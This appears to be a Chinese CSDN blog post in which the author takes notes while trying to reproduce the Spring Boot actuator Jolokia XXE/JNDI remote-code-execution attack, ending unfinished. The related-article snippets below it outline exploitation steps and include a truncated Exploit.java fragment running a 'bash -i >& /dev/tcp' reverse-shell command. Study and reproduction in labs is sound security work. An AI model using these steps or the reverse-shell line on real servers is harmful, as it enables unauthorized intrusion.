Spring actuator Jolokia XXE RCE实现(持续更新)

最新推荐文章于 2024-06-12 22:07:25 发布
最新推荐文章于 2024-06-12 22:07:25 发布
阅读量1k 收藏
点赞数
分类专栏: 安全 文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36737214/article/details/121657021
版权

背景:今天想实践一下actuator Jolokia XXE RCE的复现;复现过程中出现了很多的名词之前是没接触到的,就一此次复现做一个契机,补充一下自己需要知道的知识点

文章目录

需要了解的知识点如下:其中的每一点我基本上都会先一篇文章去整理。
在这里插入图片描述
思维导图地址地址:https://www.processon.com/mindmap/61a5edbf5653bb136f91f417

Jolokia允许通过HTTP访问所有已注册的MBean,同时可以使用URL列出所有可用的MBeans操作。(MBean是JMX中可以被动态调用的一些对象。因为图上也说过,Jolokia是JMX的一种通过HTTP使用的方式。)

我们可以看到jolokia中有logback JMXConfigurator。JMXConfigurator中提供的“reloadByURL”方法。可以从外部URL重新加载日志的记录配置. Jolokia的通信协议可看连接

<configuration>
    <appender name="STDOUT" class="ch.qos.logback.core.ConsoleAppender">
        <withJansi>true</withJansi>
        <encoder>
            <pattern>[%thread] %highlight(%-5level) %cyan(%logger{15}) - %msg %n</pattern>
        </encoder>
    </appender>
    <root level="info">
        <appender-ref ref="STDOUT" />
    </root>
    <jmxConfigurator/>
</configuration>

搭建HTTP服务器。供JMXConfigurator中提供的“reloadByURL”方法,引入外部xml文件。

1、 cd到当前目录下;
2、执行 python -c “from http.server import test, SimpleHTTPRequestHandler as RH; RH.extensions_map={k:v+’;charset=UTF-8’ for k,v in RH.extensions_map.items()}; test(RH)”
完成下载http服务器搭建:
在这里插入图片描述

解析外部引入的xml,对插入JNDI部分解析并进行创建JNDI服务

到这一步时就不知怎么去操作了,困难点如下:1、如何对JNDI进行分析?2、解析过程中如何进行调用JNDI的服务?3、JNDI服务应该如何去写,写完如何被调用?
##############2021/12/1月。 问题待解决。。。。

时不我予de哀愁
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Springboot之actuator配置不当漏洞RCEjolokia
墨痕诉清风的博客
10-25 4704
日穿扫描扫到一个spring boot actuator 可以看到有jolokia这个端点,再看下jolokia/list,存在type=MBeanFactory 关键字 可以使用jolokia-realm-jndi-rce具体步骤如下 先用python3开一个web服务 python3 -m http.server 8080 编译java利用代码 /** * javac -source 1.5 -target 1.5 JNDIObject.java * * Buil..
spring boot actuator RCE
问题很多的小明
06-27 2508
搭建漏洞环境: git clone https://github.com/veracode-research/actuator-testbed mvn install 或者 mvn spring-boot:run,如果遇到了报错,多半是因为网络问题导致本地mvn仓库下载不完全导致项目依赖解析出问题,解决办法点这里 本地访问一下: 关于路径问题:1.x版本的在根路径下注册路由,2.x版本则需要加/actuator/ 路径 描述 /autoconfig 提供了一
Spring actuator Jolokia XXE RCE
qq_35533398的博客
10-07 1607
Jolokia XXE/RCE Jolokia允许通过HTTP访问所有已注册的MBean,同时可以使用URL列出所有可用的MBeans操作,访问http://127.0.0.1:8090/jolokia/list即可列出,如下为返回: 格式化后logback Mbean: jolokia在logback JMXConfigurator中提供的“reloadByURL”方法允许从外部URL重新加载日志的记录配置 官网给出了GET和POST两种方式的访问路径以及参数: ..
Spring Core RCE 漏洞复现
最新发布
qq_73630656的博客
06-12 609
远程攻击者可在满足特定条件的基础上,通过框架的参数绑定功能获取AccessLogValve对象并诸如恶意字段值,从而触发pipeline机制并写入任意路径下的文件
Spring Boot jolokia 配置不当导致RCE漏洞
Bird&Bird
03-16 4410
访问 /jolokia/list 接口,查看是否存在 ch.qos.logback.classic.jmx.JMXConfigurator 和 reloadByURL 关键词。根据实际情况修改 springboot-realm-jndi-rce.py 脚本中的目标地址,RMI 地址、端口等信息,然后在自己控制的服务器上运行。普通 JNDI 注入受目标 JDK 版本影响,jdk < 6u201/7u191/8u182/11.0.1(LDAP),但相关环境可绕过。环境运行起来后,访问一下/jolokia接口。
SpringBoot使用Actuator+Jolokia+Telegraf+Influxdb+Grafana搭建图形化服务监控平台
weixin_33860737的博客
11-12 481
为什么80%的码农都做不了架构师?>>> ...
阿里云java源码-Spring-Boot-Actuator-Exploit:SpringBootActuator(jolokia)XXE/R
06-06
阿里云java源码Spring Boot Actuator (jolokia) XXE/RCE 来自以下文章的信息和有效载荷: 28/02/2020 编辑:另一篇使用 H2 数据库实现 RCE 的文章 在 Spring Boot Actuator < 2.0.0 和 Jolokia 1.6.0 上测试。 如果您可以使用 Spring Boot Actuator 和以下资源访问以下资源/actuator/jolokia或/jolokia : reloadByURL ,这篇文章可以帮助您利用 XXE 并最终利用 RCE。 设置环境: git clone https://github.com/artsploit/actuator-testbed cd actuator-testbed mvn install mvn spring-boot:run 1. jolokia XXE 如果操作reloadByURL存在,则可以从外部 URL 重新加载日志记录配置: logback 背后的 XML 解析器是 SAXParser。 我们可以利用此功能触发基于以下有效负载的 XXE 带外错误: # fil
原 荐 使用Spring Boot ActuatorJolokia和Grafana实现准实时监控
a50295866的博客
07-15 169
原 荐 使用Spring Boot ActuatorJolokia和[可视化]Grafana实现准实时监控. 监控系统: 日志- 基础处理 - 表格 - 可视化一体化解决方案. 不需要业务代码变动. 1. 基础数据,各个维度信息都有. 有些可能还不全. 基于这些数据去做时时可视化. ...
Spring-boot Actuator H2 RCE复现
1
09-07 2003
Spring Boot Actuator H2 RCE复现
Spring Boot Actuator H2 RCE复现
afei001
06-27 427
目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞复现 4.1 springboot docker vuln环境搭建 4.2 漏洞发现 4.3 漏洞验证 5.漏洞修复 1.漏洞概述 Spring Boot框架是最流行的基于Java的微服务框架之一,当Spring Boot Actuator配置不当可能造成多种RCE,因为Spring Boot 2.x默认使用HikariCP数据库连接池,所以可通过H2数据库实现RCE。 2.影响版本 与版本无关(主...
使用Spring Boot ActuatorJolokia和Grafana实现准实时监控
weixin_34192732的博客
02-27 249
2019独角兽企业重金招聘Python工程师标准>>> ...
Spring Boot Actuator RCE
weixin_30693683的博客
03-16 787
来看一下IDEA如何调试Spring Boot 先在https://github.com/artsploit/actuator-testbed下载源码 如下命令就能通过maven环境启动 mvn install mvn spring-boot:run 需要但开启调试模式,在pom.xml文件加入如下配置: <configuration> ...
Actuators + jolokia
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
05-07 696
首先我们查看我们当前环境http://x.x.x.x/jolokia/list地址,是否存在reloadByURL这个方法, 这个方法是造成RCE的关键。因为logback组件提供的reloadByURL操作使我们可以从外部URL重新加载日志配置创建logback.xml和file.dtd文件logback.xml文件file.dtd文件远程访问造成logback.xml文件, 造成XXE漏洞。
SpringSpring boot 可以通过集成jolokia来使用HTTP形式访问mbean
九师兄
09-20 725
1.概述 在 【SpringSpring 如何更改动态更改运行中某个类的日志级别 以及 xxx 基础上。 springboot可以通过集成jolokia来使用HTTP形式访问mbean 在pom.xml中添加依赖 <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-actuator</artifactId&g.
Spring boot Actuator配合Jolokia,Telegraf,Influxdb,Grafana实现监控
chijunmei7041的博客
12-14 347
Spring-boot-monitoring Spring boot项目监控,作为一个示例项目,研究其可行性。使用Spring initializr生成一个可运行的简单Spring boot项目,开启ActuatorJolokia支持,使用Telegraf采集项目运行信息,InfluxDB时...
springboot+Jolokia的简单使用
07-30 2955
背景:公司要求需要监控JVM做对应处理,那就只能上JMX了,然后项目本身就使用了springboot,Jolokia有在springboot中有接入,那就赶紧搞一下这个东西; 下面直接上我的研究步骤: 先把springboot和Jolokia的项目建起来(服务端) gradle引入依赖:...
Jolokia RCE漏洞利用
baidu_38844729的博客
11-30 3099
利用步骤 1、编译java利用代码,将其命名为Exploit.java,然后编译生成class文件:javac Exploit.java public class Exploit { public ExportObject() { try { System.setSecurityManager(null); java.lang.Runtime.getRuntime().exec("sh -c $@|sh . echo `bash -i >& /dev/tcp
jolokia logback JNDI RCE
12-08 1458
jolokia logback JNDI RCE漏洞分析
Spring Boot Actuator Starter的scope实现排除log4j
04-22
可以通过在pom.xml文件中指定排除log4j依赖来实现。具体做法是在Spring Boot Actuator Starter的相关依赖中添加该依赖,并将其scope属性设置为provided,如下所示: <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-actuator</artifactId> <exclusions> <exclusion> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-logging</artifactId> </exclusion> <exclusion> <groupId>log4j</groupId> <artifactId>log4j</artifactId> </exclusion> </exclusions> <scope>provided</scope> </dependency> 这样就可以排除掉Spring Boot Actuator Starter所依赖的log4j,避免冲突。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值